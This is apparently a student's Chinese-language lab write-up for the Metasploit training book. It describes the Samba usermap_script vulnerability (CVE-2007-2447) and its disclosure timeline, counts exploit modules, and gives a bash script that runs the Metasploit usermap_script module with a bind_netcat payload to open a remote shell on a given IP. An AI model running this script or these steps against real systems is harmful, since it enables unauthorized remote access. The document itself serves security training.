《Metasploit魔鬼训练营》第一章实践作业

《Metasploit魔鬼训练营》第一章实践作业

1.搜集Samba服务usermap_script安全漏洞的相关信息，画出该安全漏洞的生命周期图，标注各个重要事件点的日期，并提供详细描述和链接。

参考链接：

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447

http://samba.org/samba/security/CVE-2007-2447.html

https://www.samba.org/samba/history/security.html

https://github.com/rapid7/metasploit-framework/commits/master//modules/exploits/multi/samba/usermap_script.rb

描述：Samba协议的一个漏洞CVE-2007-2447，用户名映射脚本命令执行，影响Samba的3.0.20到3.0.25rc3 版本，当使用非默认的用户名映射脚本配置选项时产生，通过指定一个包含shell元字符的用户名，攻击者能够执行任意命令。

时间线：2007年5月7日漏洞被披露到security@samba.org这个邮箱中，2007年5月14日samba公开漏洞信息并提供了该漏洞的补丁。

2010年2月16日Metasploit首次为该漏洞提供攻击模块载荷。

2.利用Linux Shell命令统计出分别针对Windows 2000、Windows XP、Windows Server 2003、Windows Vista、Windows 7和Windows Server 2008目标环境的渗透攻击模块数量。

命令：search type:exploit target:Windows 2000

Windows 2000：170个

Windows XP：834个

Windows Server 2003：319个

Windows Vista：111个

Windows 7：705个

Windows Server 2008：278个

3.完成一次针对Linux靶机usermap_script漏洞的渗透攻击，尝试植入VNC图形化远程控制工具的攻击载荷，成功获得Linux靶机上的远程控制桌面。

用show payload查看针对该漏洞的攻击载荷，然后用set payload命令设置攻击载荷；

show options命令可以查看配置，并用set命令完成相关的配置；

用exploit命令启动渗透攻击，成功getshell。

4.使用msfcli命令行接口编写一个Shell脚本程序，实现用户只需输入目标Linux靶机的IP地址作为参数，就可以使用usermap_script漏洞渗透攻击模块，获得靶机的远程Shell访问。

用vim编辑脚本test.sh

#!/bin/bash                   #表示用bash执行
echo "please set RHOST IP"
read -p "IP:" IP              #让用户输入目标IP
msfconsole -x "use multi/samba/usermap_script;\set payload cmd/unix/bind_netcat;\set RHOST $IP;\run"    #由于最新版本的Metasploit取消了msfcli，所以现在使用msfconsole -x来执行

编辑好test.sh后，用命令 ./test.sh来执行脚本（TIPS：如果是用vim直接创建的新文件，文件是没有可执行权限的，需要用chomd命令添加可执行权限。）

成功getshell。